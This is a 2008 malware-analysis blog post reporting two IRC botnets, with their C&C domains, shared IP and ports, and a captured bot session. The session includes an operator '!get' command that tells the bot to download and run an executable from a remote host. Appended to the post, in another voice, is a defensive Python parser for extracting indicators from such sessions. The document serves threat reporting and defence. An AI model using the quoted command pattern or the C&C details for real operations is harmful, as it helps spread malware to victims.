Annoying Botnets

Saturday, May 31. 2008
At cwsandbox.org, we receive quite a few binaries these days. However, we also receive lots of "uninteresting" files, like hundreds of copies of Allaple, which we basically filter out in an automated way.
A specific annoying family of malware samples we receive a lot of is the set of bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of samples of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider has not yet reacted to abuse complaints, so I am publishing a few more details about this botnet - perhaps someone else can help. The botnet related to the first domain has its Command & Control server listening on TCP port 65520, while the second botnet has its C&C server on TCP port 80. An example of the bots' communication looks like this:
NICK rzyaaqgs
USER f020501 . . :-Service Pack 2
JOIN &virtu
:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe
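To triage captures of this kind, here is an added example (my own code, not from cwsandbox.org or this post) that parses the bot's IRC lines and pulls out the observables a responder would log: the generated nick, the host fingerprint carried in the USER real-name field, the channel joined, and the !get download URL. The sample session is the exchange quoted above.

```python
import re

# Constructed sample: the bot-side exchange quoted in the post above, as a
# defender would see it in a sandbox network log or an IRC proxy capture.
SAMPLE_SESSION = """NICK rzyaaqgs
USER f020501 . . :-Service Pack 2
JOIN &virtu
:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe
"""

# RFC 1459 line shape: [:prefix] COMMAND [middle params] [:trailing]
IRC_LINE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>[A-Za-z]+|\d{3})(?: (?P<params>.*))?$")
URL_RE = re.compile(r"https?://\S+")


def parse_irc_line(line):
    """Split one raw IRC line into (prefix, command, middle params, trailing)."""
    m = IRC_LINE.match(line.rstrip("\r\n"))
    if not m:
        return None
    params = m.group("params") or ""
    trailing = None
    if params.startswith(":"):
        params, trailing = "", params[1:]
    elif " :" in params:
        params, trailing = params.split(" :", 1)
    return m.group("prefix"), m.group("cmd").upper(), params.split(), trailing


def extract_indicators(session_text):
    """Collect (kind, value) pairs worth logging from a bot's IRC session."""
    found = []
    for raw in session_text.splitlines():
        parsed = parse_irc_line(raw)
        if parsed is None:
            continue
        _prefix, cmd, params, trailing = parsed
        if cmd == "NICK" and params:
            found.append(("nick", params[0]))
        elif cmd == "USER" and trailing is not None:
            # The real-name field is abused to report the victim's service pack
            found.append(("host_fingerprint", trailing))
        elif cmd == "JOIN" and params:
            found.append(("channel", params[0]))
        elif cmd == "PRIVMSG" and trailing and trailing.startswith("!"):
            # '!'-prefixed text from the channel operator is a bot command;
            # any URL in it is a payload the bot is told to fetch and run
            found.append(("bot_command", trailing.split()[0]))
            for url in URL_RE.findall(trailing):
                found.append(("download_url", url))
    return found
```

Feeding each sandbox run's IRC traffic through extract_indicators gives a consistent set of nick, channel and URL observables to cluster samples on, instead of comparing raw captures by hand.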